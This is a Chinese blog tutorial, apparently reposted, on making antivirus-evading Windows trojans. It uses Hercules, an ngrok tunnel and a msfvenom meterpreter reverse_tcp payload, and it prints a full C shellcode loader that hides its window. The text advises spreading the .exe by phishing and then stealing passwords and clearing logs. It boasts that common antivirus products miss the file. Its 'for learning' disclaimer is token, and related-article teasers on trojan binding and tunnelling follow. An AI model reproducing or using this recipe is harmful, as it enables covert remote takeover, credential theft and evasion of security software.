摘要:查看是否正确配置三安装安装升级升级软件包运行并生成免杀载荷选择,输入端口号用于反弹回连,之后依次输入及要生成的文件名,很简单就不截图了。
本篇文章适用学习,维护网络安全,做合法公民
介绍:之前使用 小七免杀工具包 来作免杀(有空我就上传到网盘),免杀就是对PE(.bat、.exe等)文件中出现的特征码进行替换修改,方法有等价替换指令,字符串修改大小写、互补等。
如今开源的东西比起手工来做,不仅免杀率高,速度快,功能多,而且会长期维护。下面我就介绍下 Hercules 工具:
一、安装 Kali Linux需要安装虚拟机,运行下载的.iso(如果不用Kali,BT5也可以,Kali是BT系列的升级版)。
二、搭建GO语言环境 1、安装GO解压到 /usr/local 目录下:
2、配置环境让GO命令有效:
文件后追加 export PATH=$PATH:/usr/local/go/bin:
再按 Esc ,保存退出。查看是否正确配置:
三、安装Hercules 1、安装升级升级软件包:
2、运行并生成免杀载荷选择(1),输入ip、端口号(用于反弹回连),之后依次输入y及要生成的文件名,很简单就不截图了。
文件生成后,在 在线查毒网站 检测下,显示很多杀毒软件都检测不到。
四、内网穿透 1、登录官网并添加隧道Kali Linux 上访问 ngrok网站(使用花生壳做内网穿透也可以),注册登陆,然后点击隧道管理进入:
点击确认添加,这样隧道就创建完成:
2、运行客户端进入Kali,下载运行 ngrok客户端 地址:https://www.ngrok.cc/#down-cl...,下载linux的版本
成功运行ngrok客户端后,内网穿透就弄好了,外网地址就是下图中的 server.nogrok.cc: 注册隧道的端口号
五、反向端口连接使用MetaSpolit Framework简称Msf框架。
1、生成payloadmsfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b ‘x00’ lhost=server.ngrok.cc lport=00000 -f c
-p 指定payload,–e 编码器,-i 编码次数(次数越多免杀几率越高),-b 去除坏字符,lhost 服务器(ngrok默认为server.ngrok.cc) lport 隧道的端口,-f 生成指定格式(py、exe等,建议生成c)
如果-f指定的是c,则将输出的buf[]复制出来:
2、VC6.0编译shellcode这个就不贴图了,直接贴代码了
#include#pragma comment(linker, "/subsystem:"windows" /entry:"mainCRTStartup"") // 运行时不显示窗口 unsigned char buf[] = "xbbxa1x7dx04x59xdaxcaxd9x74x24xf4x5dx31xc9xb1" "x9ex31x5dx14x03x5dx14x83xedxfcx43x88xbax1exde" "x61xa6x7ax33x5cx5cx5fx47x07xaex56x16x2fx53xa8" "x5cx61x24x38x5fxf1xd5xd8xedx77x1fxc2xb5x4fx0b" "x05xb8x9cx44xf1x31x77xdcx47x2fxafxa7xf5x50xa9" "xa3x45xb7x52x62x52x8exb9x03x5excdx1fxb8xecxa8" "x64x3ex96x16x0dx3ex5dx30x53xa7xcfxf0xd0xaax32" "xe5x6bx12x74x50xcbxddx12x89xdex29x03xcaxcbxb8" "x2cxd8xdfx42xf8xa2x42xddxdcx31xe8x15xe9x40x87" "x3cx4bxf7x79x30x7bx33xeexccx46xa6x17x39x57xec" "xf0xccx6dxe3x17xf5xe8x5cxc4xd4xbbx26x8cxc0x0e" "xe3xabxc6xadx84x0dx25x9cx37x30xd0x3cx81x9ex29" "x8bxb5xecxd2xbfx01xf0xc6x0dxdexa8x9bxe5x72x88" "x00x21xd8xacx78xb4xe7x70x05xdaxe3xa9xafxcfx2c" "x04x6axe7x0dx2cxc3xcex3ax48x0fx94xacxb9xb8xcb" "xa6xdfxedxf8x1dx75x4ex16x78xb6xe8x0cx07x48x84" "xcex79xd4xa0x68x8fxc5xd4xdex31x13x27x4exa7xaf" "x51x54x8ax12x1axb7x8ax97x60x10x48x01x6cx39x46" "x40x07x8dxe1x19xf4x65x25x87xd5x27x8bx11x7fxcb" "xd2x30x0fx91x2fx30x55x1dx7dxefxb0x03x98x59x0e" "x29xc5xbdx6cx8bxe1x84x8fxeexc9x22xe9x62xf1x06" "x19xf1xbexa5x8cx88xedxc2x71x70x01x59x4cx15x5a" "xe4xe8x75x3cxdcx96xd5x41x70xe3x60x7dx45x29x56" "xd2xf4x73xb5x06xc7xbax53x22xddxbdx5dx89x91xe6" "x72xfcx75x37xbcxedxbbx16x05x01x56x3ax32x72x69" "x93xecxa4x7bx33xffxd7x92x7dx1cxefxd7x75x7dx45" "x5fx67x47x2bx90x9bx6ex82xb4x17xcdx3bx45x8bx4d" "x45x50x71xebxb9x49x42x64xd7x0cx67x61xeex21x6e" "x78x7ex32x26xe7x65x10x9dx69x46x21x2fx97x3cx3d" "xbexd7x06x2fx5bx81xaexe9x22x6dxdcx6dx2fx64xfb" "xc1xe1xaexf6xc6x0ax73x52x10x7cxb0x3fxf2x60x69" "xafx05x6axa6x2ax53xecxb8x73xddxd3x2cx82xabx64" "x97xf3xdbxe8x2fx22x50xdexf4x2ex97x8ax79xf4xdc" "x92x37x45x23x86x63x42x5ex98xc2x49xc3x1dx34x1d" "xacx24x76xefxd7x69x8dxd2x2cx40x1cxa2x36x29x6c" "xa5x25x01xd7xbdx7cx15x54x07xaax2cx5axebx53x6d" "x3bx3ax45x50x6dx4fx96xb3xf9xdbx96x29x0dx6axa9" "x58x9fxf0x14xc3x79x0cx99x3cx58xc0x61xb6xcax5d" "x61x9fxf9x65x99xb4x91xacx5dx7cxf5x9cx99xe5x60" "x99xc9x8dxcbxe7xd4xc3x5cxd6x39xd4xe0x71x73xa2" "x24xddx3cxb4x82xdax2cxafxa5x1ex48xa7xf5x89x4d" "xb6x10x74xe5x06xf2x5bxfax3cx58x84xc6x68x16x8b" "x26x7ax2fx2ax0cx40xf8x61x8bx49x14x27xf7xe5x4f" "x9axe3x47xb7x1ax13xe9x16x06x84xabx70"; main() { ((void(*)(void))&buf)(); }
编译.cpp,生成.exe。
接下来我们还要配置Msf反向端口监听。
3、Msf配置监听Msf前先运行psql(新版Msf加入了psql的支持):
配置Msf利用:
这时我们就大功告成了,只需等待客户端运行我们的.exe(钓鱼挂马群发等方式散播)
4、测试运行.exe,Msf显示已经回连,之后的操作就跟windows一样了,读取对方密码、目录、清log等等。。。
经过运行,360、腾讯杀毒软件没有检测出来问题。。。
文章版权归作者所有,未经允许请勿转载,若此文章存在违规行为,您可以联系管理员删除。
转载请注明本文地址:https://www.ucloud.cn/yun/10019.html
摘要:查看是否正确配置三安装安装升级升级软件包运行并生成免杀载荷选择,输入端口号用于反弹回连,之后依次输入及要生成的文件名,很简单就不截图了。 本篇文章适用学习,维护网络安全,做合法公民 介绍:之前使用 小七免杀工具包 来作免杀(有空我就上传到网盘),免杀就是对PE(.bat、.exe等)文件中出现的特征码进行替换修改,方法有等价替换指令,字符串修改大小写、互补等。 如今开源的东西比起手工来...
摘要:后渗透模块该模块主要用于在取得目标系统远程控制权后,进行一系列的后渗透攻击动作,如获取敏感信息实施跳板攻击等。我将通过一个完整的渗透测试来进行框架的初步讲解,这是我在一次实战中的操作,我用虚拟机进行了简单的模拟。其中,是被迁徙的进程。 ...
摘要:安全测试讲全安全牛苑房宏是基于的发行版,设计用于数字取证操作系统。 Kali Linux安全测试(177讲全) 安全牛苑房宏 Kali Linux是基于Debian的Linux发行版, 设计用于数字取证操作系统。由Offensive Security Ltd维护和资助。最先由Offensiv...
摘要:木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马进行免杀处理。本次实验我们将学习如何通过的命令来生成木马捆绑木马以及对木马进行免杀处理。 实验简介 在一次渗透测试的过程中,避免不了使用到社会工程学的方式来诱骗对方运行我们的木马或者点击我们准备好的恶意链接。木马的捆绑在社会工程学中是我们经常使用的手段,而为了躲避杀毒软件的查杀,我们又不得不对木马...
摘要:代理技术和隧道技术都属于内网穿透,代理主要解决内网里面通信的问题比如对方在内网,你也在内网,这时候两个内网实现通信就必须要经过代理才能实现,常见工具有和等,已经停止更新了,就不演示,和一些防火墙的拦截隧道主要是一些安全设备和流量监控设备上 代理技术和隧道技术都属于内网穿透,代理主要解决...
阅读 1638·2021-10-20 13:49
阅读 2416·2021-09-24 09:48
阅读 2516·2021-09-10 10:50
阅读 2473·2021-09-06 15:01
阅读 1234·2019-08-30 15:52
阅读 2730·2019-08-29 16:37
阅读 926·2019-08-29 10:55
阅读 2938·2019-08-26 12:14